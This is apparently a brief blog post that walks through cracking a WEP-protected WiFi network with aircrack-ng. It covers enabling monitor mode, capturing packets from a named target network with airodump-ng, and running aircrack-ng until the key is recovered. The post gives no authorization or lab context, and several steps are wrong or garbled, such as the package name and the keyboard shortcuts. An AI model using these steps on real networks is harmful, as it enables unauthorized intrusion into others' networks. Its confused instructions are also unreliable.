(CLICK HERE)
Enter the terminal as administrator
- To enter terminal with administrator privilage, type sudo -s in terminal and enter your password.
Get aircrack-ng on your ubuntu or backtrack
- To get aircrack-ng, type apt-get install airmon-ng.
After the aircrack is downloaded and successfully installed.Type airmon-ng in your terminal.
- If everything is OK, you will see the list of WIFI drivers on the terminal.
Now, type airmon-ng start wlan0
- If everthing goes OK, you can see the message (monitor mode enabled on mon0)
To see available WIFI networks, type airodump-ng mon0
- If everything is ok, you will get the list of WIFI networks. Network i want to crack is Kurtosis
- Press
CTRL+Z to stop the process.
- Now,
to crack an WEP encrypted network, all you need is enough WIFI packets to
obtain the passphrase. To obtain packets type airodump-ng -c (channel) -w
(ENCRYPTION) --bssid (bssid) mon0 In my case, i would write airodump-ng -c 2 -w WEP --bssid 04:8D:38:2F:9D:C0
mon0. Dont ever close this terminal.
Open Files> Home. You can see a file with name WEP-01.cap. That is the file that contains packet.
- Now,
lets analyze the packets.
- Open
next terminal with administrator privilage.
- Type aircrack-ng and drag the WEP-01.cap file to the
terminal and hit enter.Dont forget to keep space between aircrack-ng and the
file.
- If
the process fails press CTRL+V. After that, Press Up arrow and you can see the
previously entered command. As another terminal is retriving packets, you keep
on trying the aircrack-ng command.
"If the process fails press CTRL+V. After that, Press Up arrow and you can see the previously entered command. As another terminal is retriving packets, you keep on trying the aircrack-ng command.
Now all you need is packets. See the image below, i tried with 836+760 packets. You need a minimum of 100000+ packets to crack the network. Just keep patience and keep retrieving packets and continuously keep trying the last step."
ThankYou
8:19 PM
0 comments:
Post a Comment